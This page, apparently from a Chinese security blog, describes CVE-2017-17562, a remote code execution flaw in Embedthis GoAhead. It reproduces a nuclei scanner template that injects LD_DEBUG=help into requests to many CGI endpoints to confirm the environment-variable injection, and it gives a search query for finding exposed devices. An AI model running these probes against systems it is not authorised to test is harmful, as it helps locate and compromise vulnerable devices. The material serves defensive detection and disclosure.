Embedthis GoAhead Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Embedthis GoAhead Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2017-17562

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: Embedthis GoAhead是一款轻量级的嵌入式Web服务器,广泛应用于各种嵌入式设备和网络应用中,提供HTTP服务支持。由于其轻量级和高性能的特点,GoAhead在物联网设备、路由器、网络摄像头等设备中较为常见。该漏洞影响的是GoAhead版本3.6.5之前的系统,当CGI功能启用且CGI程序动态链接时,攻击者可以利用此漏洞执行远程代码。漏洞的技术根源在于GoAhead在处理CGI请求时,未能正确验证和过滤用户输入,导致攻击者可以通过构造特殊的HTTP请求,利用环境变量注入技术执行任意命令。这种漏洞的存在使得攻击者无需认证即可远程执行代码,可能导致服务器被完全控制,数据泄露,服务中断等严重后果。由于CGI功能的广泛使用,此漏洞的影响范围较大,特别是在未及时更新的系统中。

产品厂商: embedthis

产品名称: goahead

影响版本: <3.6.5

搜索语法: cpe:”cpe:2.3:a:embedthis:goahead”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fcves%2F2017%2FCVE-2017-17562.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138

id: CVE-2017-17562

info:
  name: Embedthis GoAhead <3.6.5 - Remote Code Execution
  author: geeknik
  severity: high
  description: |
    description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.
  reference:
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
    - https://github.com/embedthis/goahead/issues/249
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-17562
    cwe-id: CWE-20
    epss-score: 0.94053
    epss-percentile: 0.99889
    cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*
  metadata:
    max-request: 66
    vendor: embedthis
    product: goahead
    shodan-query: cpe:"cpe:2.3:a:embedthis:goahead"
  tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cgi-bin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "GoAhead"
          - "cgi-bin"
        condition: or
        internal: true

  - raw:
      - |
        GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    payloads:
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022006396398547fe6251be9f9ad3b5a79dbd265ed8a4c8b32d24c03d5aacf35a4e2022100fc566d2a84f1deba46338f94549ca5a367f43b041cf1237d13ac149402c4e8a6:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Embedthis GoAhead Remote Code Execution Vulnerability
http://example.com/2025/07/21/github_1069834761/
作者
lianccc
发布于
2025年7月21日
许可协议